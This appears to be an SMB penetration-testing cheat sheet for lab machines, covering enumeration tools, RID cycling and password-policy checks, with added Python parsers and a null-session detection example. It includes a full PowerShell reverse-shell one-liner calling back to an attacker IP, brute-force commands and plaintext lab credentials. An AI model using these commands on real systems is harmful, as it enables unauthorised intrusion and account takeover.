Pentesting SMB
SMB Enumeration
SMB (Server Message Block) is a network file sharing protocol that provides access to shared files and printers on a local network.
When clients and servers use different operating systems and SMB versions, the highest supported version will be used for communication.
SMB uses the following TCP and UDP ports:
netbios-ns 137/tcp # NetBIOS Name Service
netbios-ns 137/udp
netbios-dgm 138/tcp # NetBIOS Datagram Service
netbios-dgm 138/udp
netbios-ssn 139/tcp # NetBIOS Session Service
netbios-ssn 139/udp
microsoft-ds 445/tcp # if you are using Active Directory
SMB Checklist
Basic Commands
From SMB command line
View/Get Files
get services.txt
more services.txt
Enumerate Hostname
nmblookup -A $ip
List Shares
smbmap -H $ip
smbclient -L 10.129.101.197 -U Administrator
nmap --script smb-enum-shares -p 139,445 $ip
Connect to a listed share
smbclient \\\\10.129.101.197\\C$ -U Administrator
smbclient \\\\$ip\\[share name]
Check Null Sessions
smbmap -u anonymous -H 10.10.115.116
smbmap -H $ip
rpcclient -U "" -N $ip
With authentication
smbmap -u svc-admin -p management2005 -H 10.10.248.93
Check for Vulnerabilities
nmap --script smb-vuln* -p 139,445 $ip
Overall Scan
enum4linux -a $ip
Get a shell with smbmap (windows)
smbmap -u jsmith -p 'R33nisP!nckle' -d ABC -h 192.168.2.50 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.153""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize ;$p=New-Object System.Diagnostics.Process ;$p.StartInfo.FileName=""""cmd.exe"""" ;$p.StartInfo.RedirectStandardInput=1 ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0 ;$p.Start() ;$is=$p.StandardInput ;$os=$p.StandardOutput ;Start-Sleep 1 ;$e=new-object System.Text.AsciiEncoding ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length) ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}} if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else { $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}} $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"'
Brute Force SMB
medusa -h $ip -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt
nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt $ip -vvvv
smbmap
smbmap is one of the best ways to enumerate Samba. smbmap allows pen-testers to run commands (given proper permissions), download and upload files, and overall is just incredibly useful for SMB enumeration.
smbmap -u "admin" -p "password" -H 10.10.10.10 -x "ipconfig"
-s -> specify the share to enumerate
-d -> specify the domain to enumerate
--download -> downloads a file
--upload -> uploads a file
smbclient
List shares
smbclient -L 10.10.115.116
smbclient allows you to do most of the things you can do with smbmap, and it also offers you an interactive prompt.
-w -> specify the domain (workgroup) to use when connecting to the host
-I -> specify the IP address of the host
-c "ipconfig" -> would run the ipconfig command on the host
-U -> specify the username to authenticate with
-P -> specifies the password to authenticate with
-N -> tells smbclient to not use a password
get test -> would download the file named test
put /etc/hosts -> would put your /etc/hosts file on the target
Syntax:
To see which shares are available on a given host, run:
/usr/bin/smbclient -L 10.10.10.10
For example, if you are trying to reach a directory that has been shared as 'public' on a machine called 10.10.10.10, the service would be called \\10.10.10.10\public.
However, due to shell restrictions, you will need to escape the backslashes, so you end up with something like this:
/usr/bin/smbclient \\\\10.10.10.10\\public mypasswd
To authenticate with a null session:
smbmap -u 'root' -p '' -H 10.10.232.5 -x 'ip addr'
smbclient with domain credentials
smbclient -U 'RLAB\ngodfrey' -p 445 -L 127.0.0.1
rpcclient
A tool used for executing client-side MS-RPC functions. A null session is a connection to a Samba or SMB server that does not require authentication with a password.
rpcclient -U "" [target ip address]
The -U "" option supplies an empty (null) username; you will be asked for a password, but leave it blank and press Enter.
The command line then changes to the rpcclient context:
rpcclient $>
To retrieve some general information about the server like the domain and number of users:
querydominfo
This command returns the domain, server, total users on the system and some other useful information.
Also shows the total number of user accounts and groups available on the target system.
To retrieve a list of users present on the system
enumdomusers
The result is a list of user accounts available on the system with the RID in hex. We can now use rpcclient to query the user info for more information:
lookupsids #convert SIDs to names
lookupsids S-1-5-21-3981879597-1135670737-2718083060-1002
lookupnames #convert names to SIDs
lookupnames Bill
queryuser 0x47f #get the user RID from the enumdomusers command
queryusergroups 0x47b #use the rid for the username to see their group membership
querygroup 0x47c #when you get the group membership back use those rids for this query
enumprivs
found 35 privileges
SeCreateTokenPrivilege 0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege 0:3 (0x0:0x3)
SeLockMemoryPrivilege 0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege 0:5 (0x0:0x5)
SeMachineAccountPrivilege 0:6 (0x0:0x6)
SeTcbPrivilege 0:7 (0x0:0x7)
SeSecurityPrivilege 0:8 (0x0:0x8)
SeTakeOwnershipPrivilege 0:9 (0x0:0x9)
SeLoadDriverPrivilege 0:10 (0x0:0xa)
SeSystemProfilePrivilege 0:11 (0x0:0xb)
SeSystemtimePrivilege 0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege 0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege 0:14 (0x0:0xe)
SeCreatePagefilePrivilege 0:15 (0x0:0xf)
SeCreatePermanentPrivilege 0:16 (0x0:0x10)
SeBackupPrivilege 0:17 (0x0:0x11)
SeRestorePrivilege 0:18 (0x0:0x12)
SeShutdownPrivilege 0:19 (0x0:0x13)
SeDebugPrivilege 0:20 (0x0:0x14)
SeAuditPrivilege 0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege 0:22 (0x0:0x16)
SeChangeNotifyPrivilege 0:23 (0x0:0x17)
SeRemoteShutdownPrivilege 0:24 (0x0:0x18)
SeUndockPrivilege 0:25 (0x0:0x19)
SeSyncAgentPrivilege 0:26 (0x0:0x1a)
SeEnableDelegationPrivilege 0:27 (0x0:0x1b)
SeManageVolumePrivilege 0:28 (0x0:0x1c)
SeImpersonatePrivilege 0:29 (0x0:0x1d)
SeCreateGlobalPrivilege 0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege 0:31 (0x0:0x1f)
SeRelabelPrivilege 0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege 0:33 (0x0:0x21)
SeTimeZonePrivilege 0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege 0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege 0:36 (0x0:0x24)
Enumerate privileges on the target box
getusername
Account Name: Guest, Authority Name: RELEVANT
Get username you are running as
queryuser [username]
username=pbx
queryuser pbx, queryuser 1000, queryuser 0x3e8
- This command returns information about the profile path on the server, the home drive, password-related settings and a lot more.
To see an overview of all enumeration commands, type enum and press Tab twice.
If you get an error that says:
Cannot connect to server. Error was NT_STATUS_CONNECTION_DISCONNECTED
This occurs because the minimum protocol version for smbclient has been set to SMB2_02.
Fix with:
sudo vim /etc/samba/smb.conf
Add the following line to the config under the [global] section:
client min protocol = CORE
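An added example (not part of the original page or of Samba) that turns this fix into a check: a small Python parser for smb.conf that reports the effective client min protocol and whether the setting lets the client fall back to SMB1 dialects. The dialect list and the SMB2_02 default are assumptions taken from the error above; both sample configs are constructed.

```python
from typing import Dict

# Assumption: the dialect names Samba accepts for "client min protocol",
# in ascending order. CORE through NT1 are SMB1 dialects.
DIALECT_ORDER = ["CORE", "COREPLUS", "LANMAN1", "LANMAN2", "NT1",
                 "SMB2_02", "SMB2_10", "SMB3_00", "SMB3_02", "SMB3_11"]
SMB1_DIALECTS = set(DIALECT_ORDER[:5])

# Constructed sample: a stock-looking smb.conf before and after the fix above.
SMB_CONF_BEFORE = """
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba, Ubuntu)
   ; security settings live here too
   log file = /var/log/samba/log.%m

[printers]
   comment = All Printers
   path = /var/spool/samba
"""
SMB_CONF_AFTER = SMB_CONF_BEFORE.replace(
    "[global]\n", "[global]\n   client min protocol = CORE\n", 1)


def parse_smb_conf(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal smb.conf parser: section -> {key: value}.

    Keys are lower-cased with internal whitespace collapsed, values are
    stripped, and lines starting with '#' or ';' are comments.
    """
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue  # stray line outside any section, or not a key = value pair
        key, _, value = line.partition("=")
        sections[current][" ".join(key.split()).lower()] = value.strip()
    return sections


def client_min_protocol(conf: Dict[str, Dict[str, str]], default: str = "SMB2_02") -> str:
    """Effective client min protocol; the page names SMB2_02 as the default."""
    return conf.get("global", {}).get("client min protocol", default).upper()


def allows_smb1_client(conf: Dict[str, Dict[str, str]]) -> bool:
    """True when the client is willing to negotiate an SMB1 dialect."""
    return client_min_protocol(conf) in SMB1_DIALECTS


if __name__ == "__main__":
    for label, text in (("before", SMB_CONF_BEFORE), ("after", SMB_CONF_AFTER)):
        conf = parse_smb_conf(text)
        print(label, client_min_protocol(conf), "SMB1 allowed:", allows_smb1_client(conf))
```

The check reports True after the fix, which is the trade-off being made: the NT_STATUS_CONNECTION_DISCONNECTED error goes away because smbclient is now willing to fall back to SMB1 against a server that offers nothing newer.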
Alternative method to enumdomusers is through RID cycling.
To determine the full domain SID, run the lookupnames command on a known username and read the domain part of the returned SID:
lookupnames pbx
There are two sets of RIDs: 500-1000 for system accounts and 1000-10000 for domain-created users and groups.
If we append -500 to the SID and look it up using the lookupsids command we get the following output with the username:
rpcclient $> lookupsids S-1-5-21-532510730-1394270290-3802288464-500
S-1-5-21-532510730-1394270290-3802288464-500 *unknown*\*unknown* (8)
The SID is unknown, so increase the RID by one:
rpcclient $> lookupsids S-1-5-21-532510730-1394270290-3802288464-501
S-1-5-21-532510730-1394270290-3802288464-501 PBX\nobody (1)
That finds a valid user; now increase the RID to 1000:
rpcclient $> lookupsids S-1-5-21-532510730-1394270290-3802288464-1000
S-1-5-21-532510730-1394270290-3802288464-1000 PBX\pbx (1)
We now have the full SID of a domain-created user.
lookupsid.py Username Enumeration
Impacket's lookupsid.py performs bruteforcing of Windows SIDs to identify users and groups on the remote target.
You need to be able to connect to IPC$ without authentication or with a known username and password.
python3 lookupsid.py [username]@10.10.11.35 | tee users.txt
Password:
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Brute forcing SIDs at 10.10.11.35
[*] StringBinding ncacn_np:10.10.11.35[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-917908876-1423158569-3159038727
498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: CICADA\Administrator (SidTypeUser)
501: CICADA\Guest (SidTypeUser)
502: CICADA\krbtgt (SidTypeUser)
512: CICADA\Domain Admins (SidTypeGroup)
513: CICADA\Domain Users (SidTypeGroup)
514: CICADA\Domain Guests (SidTypeGroup)
515: CICADA\Domain Computers (SidTypeGroup)
516: CICADA\Domain Controllers (SidTypeGroup)
517: CICADA\Cert Publishers (SidTypeAlias)
518: CICADA\Schema Admins (SidTypeGroup)
519: CICADA\Enterprise Admins (SidTypeGroup)
520: CICADA\Group Policy Creator Owners (SidTypeGroup)
521: CICADA\Read-only Domain Controllers (SidTypeGroup)
522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
525: CICADA\Protected Users (SidTypeGroup)
526: CICADA\Key Admins (SidTypeGroup)
527: CICADA\Enterprise Key Admins (SidTypeGroup)
553: CICADA\RAS and IAS Servers (SidTypeAlias)
571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
1000: CICADA\CICADA-DC$ (SidTypeUser)
1101: CICADA\DnsAdmins (SidTypeAlias)
1102: CICADA\DnsUpdateProxy (SidTypeGroup)
1103: CICADA\Groups (SidTypeGroup)
1104: CICADA\john.smoulder (SidTypeUser)
1105: CICADA\sarah.dantelia (SidTypeUser)
1106: CICADA\michael.wrightson (SidTypeUser)
1108: CICADA\david.orelious (SidTypeUser)
1109: CICADA\Dev Support (SidTypeGroup)
1601: CICADA\emily.oscars (SidTypeUser)
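The SID arithmetic behind both the manual RID cycling above and the lookupsid.py output, as an added example that is not part of the page or of Impacket: it splits a full SID into domain SID and RID, classifies RIDs by the ranges described above, and parses both rpcclient lookupsids lines and lookupsid.py lines into one list of account records. The well-known RID table is a subset of the output above; the rpcclient type codes (1 user, 2 group, 4 alias, 8 unknown) are an assumption based on the LSA SID_NAME_USE values; the sample lines are copied from the outputs above.

```python
import re
from typing import Dict, List, Optional, Tuple

# Subset of the well-known RIDs seen in the lookupsid.py output above.
WELL_KNOWN_RIDS: Dict[int, str] = {
    500: "Administrator", 501: "Guest", 502: "krbtgt",
    512: "Domain Admins", 513: "Domain Users", 519: "Enterprise Admins",
}
DOMAIN_RID_START = 1000  # domain-created users and groups start here

# A domain account SID is the S-1-5-21-<three sub-authorities> domain part plus a RID.
SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")
DOMAIN_SID_LINE_RE = re.compile(r"Domain SID is:\s*(S-1-5-21-\d+-\d+-\d+)")
# lookupsid.py line:        "1104: CICADA\john.smoulder (SidTypeUser)"
LOOKUPSID_RE = re.compile(r"^\s*(\d+):\s+([^\\]+)\\(.+?)\s+\((SidType\w+)\)\s*$")
# rpcclient lookupsids line: "S-1-5-21-...-501 PBX\nobody (1)"
RPCCLIENT_RE = re.compile(r"^\s*(S-1-5-21-\d+-\d+-\d+-\d+)\s+([^\\]+)\\(.+?)\s+\((\d+)\)\s*$")
# Assumption: LSA SID_NAME_USE codes as printed in parentheses by rpcclient.
RPCCLIENT_TYPES = {1: "SidTypeUser", 2: "SidTypeGroup", 4: "SidTypeAlias", 8: "SidTypeUnknown"}

# Sample input copied from the two outputs above (raw strings keep the backslashes).
SAMPLE_LOOKUPSID = r"""
[*] Domain SID is: S-1-5-21-917908876-1423158569-3159038727
500: CICADA\Administrator (SidTypeUser)
501: CICADA\Guest (SidTypeUser)
512: CICADA\Domain Admins (SidTypeGroup)
1000: CICADA\CICADA-DC$ (SidTypeUser)
1104: CICADA\john.smoulder (SidTypeUser)
1109: CICADA\Dev Support (SidTypeGroup)
"""
SAMPLE_RPCCLIENT = r"""
S-1-5-21-532510730-1394270290-3802288464-500 *unknown*\*unknown* (8)
S-1-5-21-532510730-1394270290-3802288464-501 PBX\nobody (1)
S-1-5-21-532510730-1394270290-3802288464-1000 PBX\pbx (1)
"""


def split_sid(sid: str) -> Tuple[str, int]:
    """Split a full account SID into (domain SID, RID)."""
    m = SID_RE.match(sid.strip())
    if not m:
        raise ValueError(f"not a domain account SID: {sid!r}")
    return m.group(1), int(m.group(2))


def build_sid(domain_sid: str, rid: int) -> str:
    """Append a RID to a domain SID, the form lookupsids expects."""
    return f"{domain_sid}-{rid}"


def rid_class(rid: int) -> str:
    """Classify a RID by the ranges the page describes."""
    if rid in WELL_KNOWN_RIDS:
        return "well-known"
    return "system" if rid < DOMAIN_RID_START else "domain-created"


def domain_sid_from_output(text: str) -> Optional[str]:
    """Pull the domain SID out of the lookupsid.py banner line."""
    m = DOMAIN_SID_LINE_RE.search(text)
    return m.group(1) if m else None


def parse_lookup_output(text: str) -> List[dict]:
    """Parse lookupsid.py or rpcclient lookupsids lines into account records."""
    records = []
    for line in text.splitlines():
        m = LOOKUPSID_RE.match(line)
        if m:
            rid, domain, name, kind = int(m.group(1)), m.group(2), m.group(3), m.group(4)
        else:
            m = RPCCLIENT_RE.match(line)
            if not m:
                continue  # blank lines, banner and "[*]" status lines
            _, rid = split_sid(m.group(1))
            domain, name = m.group(2), m.group(3)
            kind = RPCCLIENT_TYPES.get(int(m.group(4)), "SidTypeUnknown")
        if kind == "SidTypeUnknown":
            continue  # unused RID, like the -500 lookup above
        records.append({"rid": rid, "domain": domain, "name": name,
                        "type": kind, "class": rid_class(rid)})
    return records


def user_accounts(records: List[dict]) -> List[str]:
    """User names only, leaving out machine accounts (trailing $)."""
    return [r["name"] for r in records
            if r["type"] == "SidTypeUser" and not r["name"].endswith("$")]


if __name__ == "__main__":
    for rec in parse_lookup_output(SAMPLE_LOOKUPSID) + parse_lookup_output(SAMPLE_RPCCLIENT):
        print(f"{rec['rid']:>5} {rec['domain']}\\{rec['name']:<24} {rec['type']:<14} {rec['class']}")
```

Piping the saved users.txt through parse_lookup_output and user_accounts gives the same list the page collects by hand, with machine accounts and unused RIDs already dropped; rid_class makes the 500/1000 boundary from the RID cycling section explicit.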
Enum4linux
Enum4linux is a Linux alternative to enum.exe and is used to enumerate data from Windows or Samba hosts.
enum4linux [target ip]
- Will automatically RID cycle
Part of autorecon!
Recommended: redirect (>) the output to a text file for reference (it is a lot).
Nmap SMB scripts
ls -l /usr/share/nmap/scripts/smb*
nmap --script=[scriptname] [target ip]
For smb-os-discovery:
nmap -p 139,445 --script=smb-os-discovery [target ip]
First, scan the target for all known SMB vulnerabilities; second, check whether the target is vulnerable to EternalBlue:
nmap -p 139,445 --script=smb-vuln* [target ip]
nmap -p 445 [target] --script=smb-vuln-ms17-010
Finding the Password Policy
Various ways to find a box's password policy
crackmapexec smb 10.10.10.161 --pass-pol
crackmapexec smb 10.10.10.161 --pass-pol -u '' -p ''
enum4linux 10.10.10.161
This will sometimes not work because on a newly installed domain null sessions are disabled.
However, when a domain was upgraded from Windows 2000/2003/2008, this feature was kept enabled for backwards compatibility.
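From the defender's side, the null sessions this section relies on leave a trace on the target: an anonymous network logon (Security event 4624, logon type 3, account ANONYMOUS LOGON) followed by access to the IPC$ share (event 5140, which only appears when file-share auditing is enabled). The following Python is an added example, not part of the page, that runs that correlation over a constructed set of events; the flattened field names mirror the data fields of those two events, and the source addresses and user name jdoe are made up.

```python
from collections import defaultdict
from typing import Dict, List

# Constructed sample of Security log events reduced to the fields the
# detection needs (real events carry many more). 4624 = logon, 5140 = share accessed.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "4624", "LogonType": "3", "TargetUserName": "ANONYMOUS LOGON",
     "TargetDomainName": "NT AUTHORITY", "AuthenticationPackageName": "NTLM",
     "IpAddress": "10.10.14.7"},
    {"EventID": "5140", "SubjectUserName": "ANONYMOUS LOGON",
     "ShareName": r"\\*\IPC$", "IpAddress": "10.10.14.7"},
    # normal authenticated user touching IPC$: not a null session
    {"EventID": "4624", "LogonType": "3", "TargetUserName": "jdoe",
     "TargetDomainName": "CORP", "AuthenticationPackageName": "Kerberos",
     "IpAddress": "10.10.11.50"},
    {"EventID": "5140", "SubjectUserName": "jdoe",
     "ShareName": r"\\*\IPC$", "IpAddress": "10.10.11.50"},
    # anonymous logon with no share access afterwards: noisy but inconclusive
    {"EventID": "4624", "LogonType": "3", "TargetUserName": "ANONYMOUS LOGON",
     "TargetDomainName": "NT AUTHORITY", "AuthenticationPackageName": "NTLM",
     "IpAddress": "10.10.11.22"},
]


def is_anonymous_logon(ev: Dict[str, str]) -> bool:
    """4624 with logon type 3 (network) for the ANONYMOUS LOGON account."""
    return (ev.get("EventID") == "4624" and ev.get("LogonType") == "3"
            and ev.get("TargetUserName", "").upper() == "ANONYMOUS LOGON")


def is_anonymous_ipc_access(ev: Dict[str, str]) -> bool:
    """5140 on the IPC$ share by the ANONYMOUS LOGON account."""
    return (ev.get("EventID") == "5140"
            and ev.get("ShareName", "").upper().endswith(r"\IPC$")
            and ev.get("SubjectUserName", "").upper() == "ANONYMOUS LOGON")


def summarize_by_source(events: List[Dict[str, str]]) -> Dict[str, Dict[str, int]]:
    """Count anonymous logons and anonymous IPC$ accesses per source address."""
    summary: Dict[str, Dict[str, int]] = defaultdict(
        lambda: {"anonymous_logons": 0, "anonymous_ipc_access": 0})
    for ev in events:
        ip = ev.get("IpAddress", "-")
        if is_anonymous_logon(ev):
            summary[ip]["anonymous_logons"] += 1
        elif is_anonymous_ipc_access(ev):
            summary[ip]["anonymous_ipc_access"] += 1
    return dict(summary)


def null_session_sources(events: List[Dict[str, str]]) -> List[str]:
    """Sources that both logged on anonymously and reached IPC$ anonymously."""
    return sorted(ip for ip, s in summarize_by_source(events).items()
                  if s["anonymous_logons"] and s["anonymous_ipc_access"])


if __name__ == "__main__":
    for ip, counts in summarize_by_source(SAMPLE_EVENTS).items():
        print(ip, counts)
    print("null session sources:", null_session_sources(SAMPLE_EVENTS))
```

The correlation matters because anonymous 4624 events on their own are common on domain controllers; the pairing with an anonymous IPC$ access is what distinguishes rpcclient or enum4linux null-session enumeration from background noise. The domain behaviour described above is controlled by the "Network access: Do not allow anonymous enumeration of SAM accounts and shares" policy, which is why the same commands succeed on an upgraded domain and fail on a fresh one.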
Impacket psexec command execution
psexec.py CICADA/emily.oscars:'Q!3@Lp#M6b*7t*Vt'@10.10.11.35 dir